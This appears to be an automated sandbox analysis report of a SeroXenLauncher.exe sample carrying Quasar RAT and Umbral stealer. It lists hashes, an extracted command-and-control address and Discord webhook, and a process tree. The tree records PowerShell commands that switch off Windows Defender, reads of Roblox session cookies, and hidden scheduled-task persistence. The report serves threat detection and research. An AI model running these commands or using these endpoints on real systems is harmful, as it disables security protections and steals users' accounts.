Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240611-en -
resource tags
arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system -
submitted
02-07-2024 00:58
Behavioral task
behavioral1
Sample
SeroXenLauncher.exe
Resource
win7-20240611-en
General
-
Target
SeroXenLauncher.exe
-
Size
409KB
-
MD5
54d920888e6066870191f44fe0b27206
-
SHA1
87feb8a460dd1dc736fc96fbfbe37bf67aed2c3e
-
SHA256
5416eb9ce7028292f5810ab8acec85ab7cd55503bcdf097f3e2ce2a900577797
-
SHA512
4b23903103954c5d491eedc1c77fec1fea32552b9b863ada312b75388a9a56d38573851d2f6edaf61444fb0549196b1e9310cb6fa4e1773b9bf65291d5e2f72d
-
SSDEEP
6144:EM7Cp8XlizQNOa/YzLU+RefWtEOag0vQUvb3pOMZ97iJcfaohEt2+4nQQ:4pQl4QR/2LU+RefW7qg27iC+t0nQQ
Malware Config
Extracted
quasar
3.1.5
SeroXen
127.0.0.1:4782
browser-julia.gl.at.ply.gg:54488
$Sxr-GV6wZsGZZMeZ3qfenc
-
encryption_key
KH74MFPau2OXY0OqPzU8
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
umbral
https://discord.com/api/webhooks/1257452635888423017/-MpHtN8_KQyb61HJqaai1yrkmHQG75b_w1I_FDSgXUCXHSAsskj1fAM-GezxYcBKnRgl
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x0004000000004ed7-20.dat family_umbral behavioral1/memory/3016-24-0x0000000000370000-0x00000000003B0000-memory.dmp family_umbral -
Quasar payload 5 IoCs
resource yara_rule behavioral1/memory/2424-1-0x0000000001380000-0x00000000013EC000-memory.dmp family_quasar behavioral1/files/0x0050000000014f57-4.dat family_quasar behavioral1/memory/2668-10-0x0000000000CE0000-0x0000000000D4C000-memory.dmp family_quasar behavioral1/files/0x0005000000004ed7-78.dat family_quasar behavioral1/memory/2456-83-0x0000000001090000-0x00000000010FC000-memory.dmp family_quasar -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1656 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts 0qvKpKh1rzyY.exe -
Executes dropped EXE 3 IoCs
pid Process 2668 Client.exe 3016 0qvKpKh1rzyY.exe 2456 8OHR20XSEmaa.bat -
Loads dropped DLL 3 IoCs
pid Process 2424 SeroXenLauncher.exe 2668 Client.exe 2668 Client.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 18 discord.com 19 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com 15 ip-api.com -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\SysWOW64\SubDir\Client.exe SeroXenLauncher.exe File opened for modification C:\Windows\SysWOW64\SubDir\Client.exe SeroXenLauncher.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 964 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 944 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2392 schtasks.exe 1128 schtasks.exe 2080 SCHTASKS.exe 872 SCHTASKS.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3016 0qvKpKh1rzyY.exe 1656 powershell.exe 824 powershell.exe 2212 powershell.exe 1480 powershell.exe 600 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2424 SeroXenLauncher.exe Token: SeDebugPrivilege 2668 Client.exe Token: SeDebugPrivilege 3016 0qvKpKh1rzyY.exe Token: SeIncreaseQuotaPrivilege 2328 wmic.exe Token: SeSecurityPrivilege 2328 wmic.exe Token: SeTakeOwnershipPrivilege 2328 wmic.exe Token: SeLoadDriverPrivilege 2328 wmic.exe Token: SeSystemProfilePrivilege 2328 wmic.exe Token: SeSystemtimePrivilege 2328 wmic.exe Token: SeProfSingleProcessPrivilege 2328 wmic.exe Token: SeIncBasePriorityPrivilege 2328 wmic.exe Token: SeCreatePagefilePrivilege 2328 wmic.exe Token: SeBackupPrivilege 2328 wmic.exe Token: SeRestorePrivilege 2328 wmic.exe Token: SeShutdownPrivilege 2328 wmic.exe Token: SeDebugPrivilege 2328 wmic.exe Token: SeSystemEnvironmentPrivilege 2328 wmic.exe Token: SeRemoteShutdownPrivilege 2328 wmic.exe Token: SeUndockPrivilege 2328 wmic.exe Token: SeManageVolumePrivilege 2328 wmic.exe Token: 33 2328 wmic.exe Token: 34 2328 wmic.exe Token: 35 2328 wmic.exe Token: SeIncreaseQuotaPrivilege 2328 wmic.exe Token: SeSecurityPrivilege 2328 wmic.exe Token: SeTakeOwnershipPrivilege 2328 wmic.exe Token: SeLoadDriverPrivilege 2328 wmic.exe Token: SeSystemProfilePrivilege 2328 wmic.exe Token: SeSystemtimePrivilege 2328 wmic.exe Token: SeProfSingleProcessPrivilege 2328 wmic.exe Token: SeIncBasePriorityPrivilege 2328 wmic.exe Token: SeCreatePagefilePrivilege 2328 wmic.exe Token: SeBackupPrivilege 2328 wmic.exe Token: SeRestorePrivilege 2328 wmic.exe Token: SeShutdownPrivilege 2328 wmic.exe Token: SeDebugPrivilege 2328 wmic.exe Token: SeSystemEnvironmentPrivilege 2328 wmic.exe Token: SeRemoteShutdownPrivilege 2328 wmic.exe Token: SeUndockPrivilege 2328 wmic.exe Token: SeManageVolumePrivilege 2328 wmic.exe Token: 33 2328 wmic.exe Token: 34 2328 wmic.exe Token: 35 2328 wmic.exe Token: SeDebugPrivilege 1656 powershell.exe Token: SeDebugPrivilege 824 powershell.exe Token: SeDebugPrivilege 2212 powershell.exe Token: SeDebugPrivilege 1480 powershell.exe Token: SeIncreaseQuotaPrivilege 328 wmic.exe Token: SeSecurityPrivilege 328 wmic.exe Token: SeTakeOwnershipPrivilege 328 wmic.exe Token: SeLoadDriverPrivilege 328 wmic.exe Token: SeSystemProfilePrivilege 328 wmic.exe Token: SeSystemtimePrivilege 328 wmic.exe Token: SeProfSingleProcessPrivilege 328 wmic.exe Token: SeIncBasePriorityPrivilege 328 wmic.exe Token: SeCreatePagefilePrivilege 328 wmic.exe Token: SeBackupPrivilege 328 wmic.exe Token: SeRestorePrivilege 328 wmic.exe Token: SeShutdownPrivilege 328 wmic.exe Token: SeDebugPrivilege 328 wmic.exe Token: SeSystemEnvironmentPrivilege 328 wmic.exe Token: SeRemoteShutdownPrivilege 328 wmic.exe Token: SeUndockPrivilege 328 wmic.exe Token: SeManageVolumePrivilege 328 wmic.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2668 Client.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2424 wrote to memory of 2392 2424 SeroXenLauncher.exe 29 PID 2424 wrote to memory of 2392 2424 SeroXenLauncher.exe 29 PID 2424 wrote to memory of 2392 2424 SeroXenLauncher.exe 29 PID 2424 wrote to memory of 2392 2424 SeroXenLauncher.exe 29 PID 2424 wrote to memory of 2392 2424 SeroXenLauncher.exe 29 PID 2424 wrote to memory of 2392 2424 SeroXenLauncher.exe 29 PID 2424 wrote to memory of 2392 2424 SeroXenLauncher.exe 29 PID 2424 wrote to memory of 2668 2424 SeroXenLauncher.exe 31 PID 2424 wrote to memory of 2668 2424 SeroXenLauncher.exe 31 PID 2424 wrote to memory of 2668 2424 SeroXenLauncher.exe 31 PID 2424 wrote to memory of 2668 2424 SeroXenLauncher.exe 31 PID 2424 wrote to memory of 2668 2424 SeroXenLauncher.exe 31 PID 2424 wrote to memory of 2668 2424 SeroXenLauncher.exe 31 PID 2424 wrote to memory of 2668 2424 SeroXenLauncher.exe 31 PID 2668 wrote to memory of 1128 2668 Client.exe 32 PID 2668 wrote to memory of 1128 2668 Client.exe 32 PID 2668 wrote to memory of 1128 2668 Client.exe 32 PID 2668 wrote to memory of 1128 2668 Client.exe 32 PID 2668 wrote to memory of 1128 2668 Client.exe 32 PID 2668 wrote to memory of 1128 2668 Client.exe 32 PID 2668 wrote to memory of 1128 2668 Client.exe 32 PID 2424 wrote to memory of 2080 2424 SeroXenLauncher.exe 34 PID 2424 wrote to memory of 2080 2424 SeroXenLauncher.exe 34 PID 2424 wrote to memory of 2080 2424 SeroXenLauncher.exe 34 PID 2424 wrote to memory of 2080 2424 SeroXenLauncher.exe 34 PID 2424 wrote to memory of 2080 2424 SeroXenLauncher.exe 34 PID 2424 wrote to memory of 2080 2424 SeroXenLauncher.exe 34 PID 2424 wrote to memory of 2080 2424 SeroXenLauncher.exe 34 PID 2668 wrote to memory of 3016 2668 Client.exe 38 PID 2668 wrote to memory of 3016 2668 Client.exe 38 PID 2668 wrote to memory of 3016 2668 Client.exe 38 PID 2668 wrote to memory of 3016 2668 Client.exe 38 PID 3016 wrote to memory of 2328 3016 0qvKpKh1rzyY.exe 39 PID 3016 wrote to memory of 2328 3016 0qvKpKh1rzyY.exe 39 PID 3016 wrote to memory of 2328 3016 0qvKpKh1rzyY.exe 39 PID 3016 wrote to memory of 1604 3016 0qvKpKh1rzyY.exe 41 PID 3016 wrote to memory of 1604 3016 0qvKpKh1rzyY.exe 41 PID 3016 wrote to memory of 1604 3016 0qvKpKh1rzyY.exe 41 PID 3016 wrote to memory of 1656 3016 0qvKpKh1rzyY.exe 43 PID 3016 wrote to memory of 1656 3016 0qvKpKh1rzyY.exe 43 PID 3016 wrote to memory of 1656 3016 0qvKpKh1rzyY.exe 43 PID 3016 wrote to memory of 824 3016 0qvKpKh1rzyY.exe 45 PID 3016 wrote to memory of 824 3016 0qvKpKh1rzyY.exe 45 PID 3016 wrote to memory of 824 3016 0qvKpKh1rzyY.exe 45 PID 3016 wrote to memory of 2212 3016 0qvKpKh1rzyY.exe 47 PID 3016 wrote to memory of 2212 3016 0qvKpKh1rzyY.exe 47 PID 3016 wrote to memory of 2212 3016 0qvKpKh1rzyY.exe 47 PID 3016 wrote to memory of 1480 3016 0qvKpKh1rzyY.exe 49 PID 3016 wrote to memory of 1480 3016 0qvKpKh1rzyY.exe 49 PID 3016 wrote to memory of 1480 3016 0qvKpKh1rzyY.exe 49 PID 3016 wrote to memory of 328 3016 0qvKpKh1rzyY.exe 51 PID 3016 wrote to memory of 328 3016 0qvKpKh1rzyY.exe 51 PID 3016 wrote to memory of 328 3016 0qvKpKh1rzyY.exe 51 PID 3016 wrote to memory of 2356 3016 0qvKpKh1rzyY.exe 53 PID 3016 wrote to memory of 2356 3016 0qvKpKh1rzyY.exe 53 PID 3016 wrote to memory of 2356 3016 0qvKpKh1rzyY.exe 53 PID 3016 wrote to memory of 1792 3016 0qvKpKh1rzyY.exe 55 PID 3016 wrote to memory of 1792 3016 0qvKpKh1rzyY.exe 55 PID 3016 wrote to memory of 1792 3016 0qvKpKh1rzyY.exe 55 PID 3016 wrote to memory of 600 3016 0qvKpKh1rzyY.exe 57 PID 3016 wrote to memory of 600 3016 0qvKpKh1rzyY.exe 57 PID 3016 wrote to memory of 600 3016 0qvKpKh1rzyY.exe 57 PID 3016 wrote to memory of 964 3016 0qvKpKh1rzyY.exe 59 PID 3016 wrote to memory of 964 3016 0qvKpKh1rzyY.exe 59 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1604 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\SeroXenLauncher.exe"C:\Users\Admin\AppData\Local\Temp\SeroXenLauncher.exe"1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\SeroXenLauncher.exe" /rl HIGHEST /f2⤵
- Scheduled Task/Job: Scheduled Task
PID:2392
-
-
C:\Windows\SysWOW64\SubDir\Client.exe"C:\Windows\SysWOW64\SubDir\Client.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\SysWOW64\SubDir\Client.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:1128
-
-
C:\Users\Admin\AppData\Local\Temp\0qvKpKh1rzyY.exe"C:\Users\Admin\AppData\Local\Temp\0qvKpKh1rzyY.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2328
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\0qvKpKh1rzyY.exe"4⤵
- Views/modifies file attributes
PID:1604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\0qvKpKh1rzyY.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2212
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1480
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:328
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵PID:2356
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵PID:1792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Suspicious behavior: EnumeratesProcesses
PID:600
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
PID:964
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\0qvKpKh1rzyY.exe" && pause4⤵PID:1984
-
C:\Windows\system32\PING.EXEping localhost5⤵
- Runs ping.exe
PID:944
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\8OHR20XSEmaa.bat"C:\Users\Admin\AppData\Local\Temp\8OHR20XSEmaa.bat"3⤵
- Executes dropped EXE
PID:2456 -
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$778OHR20XSEmaa.bat" /tr "'C:\Users\Admin\AppData\Local\Temp\8OHR20XSEmaa.bat'" /sc onlogon /rl HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:872
-
-
-
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77SeroXenLauncher.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\SeroXenLauncher.exe'" /sc onlogon /rl HIGHEST2⤵
- Scheduled Task/Job: Scheduled Task
PID:2080
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
319KB
MD50c7336131c6cab639709f528d0a918b3
SHA1acf92382d5318d0b09192b9c16127dd45c33ab5f
SHA256d5c029dffe5e9c71677a20dc7850c0f3e9f63c26e9f1f34d6460c43b86d3ce5e
SHA5124c608f57f79aa766b7998bdb452b8da6f6cf49c7c5eedf70b56c25f0e5a3a9d4cdc7f65776f0497c8e3be19071bc59220073ca13f3a3932e5f41eba72ac688cd
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5b14e2d8721da545b5d5835c197c8aaa8
SHA144b119a88c631a9d1f6310b193dbb930e43060a1
SHA2562eb6fb48fb16c0d6d5b0a4e7c4e3493bbacac3f1cdffbbd411e2c890af231860
SHA512516ec12918ad13e50dc2e47f693deeb3a11ddbc32d027f2895ddb4f5e63858bfcc3fa6dd33e6e5a98d1f92e0d2203adfcfdc483c6486a0a4fa97e9db3f16b747
-
Filesize
231KB
MD5ba3e0c4b34603ac162dd8e405edf8e0c
SHA15c313bcebdf01c4f7338e60a9c45f9ec71eddc35
SHA256706b970e2f91391d7a3b270cefdd350c8c195afb5ee774cd74a06bda2e1e0b60
SHA512a62c8219ab1cf49474375b02ce7827488ac9512dac91d6d2c32112260ad33315c88fc25f62570d09e7662e2e660e37b23bef57b5d55ac1abd5d1f685e76ea695
-
Filesize
409KB
MD5fc51dabe5c87dd05143a263355e3886d
SHA11e40305ea3d0a6230ddd475e38be53d9129381c8
SHA256f60075eaa6a46c80a5a3b6bdb669cd4a3b05ec58767bca6a5121dc4f50b178cd
SHA512c2f963b86147bb28773293709dd04b40c1e37bd014ad2f1544aec924f22b27dc1feca90d34b656afd49356f1610c1d3bd5a2116cd53b1e47a5e11e50127ee904
-
Filesize
409KB
MD554d920888e6066870191f44fe0b27206
SHA187feb8a460dd1dc736fc96fbfbe37bf67aed2c3e
SHA2565416eb9ce7028292f5810ab8acec85ab7cd55503bcdf097f3e2ce2a900577797
SHA5124b23903103954c5d491eedc1c77fec1fea32552b9b863ada312b75388a9a56d38573851d2f6edaf61444fb0549196b1e9310cb6fa4e1773b9bf65291d5e2f72d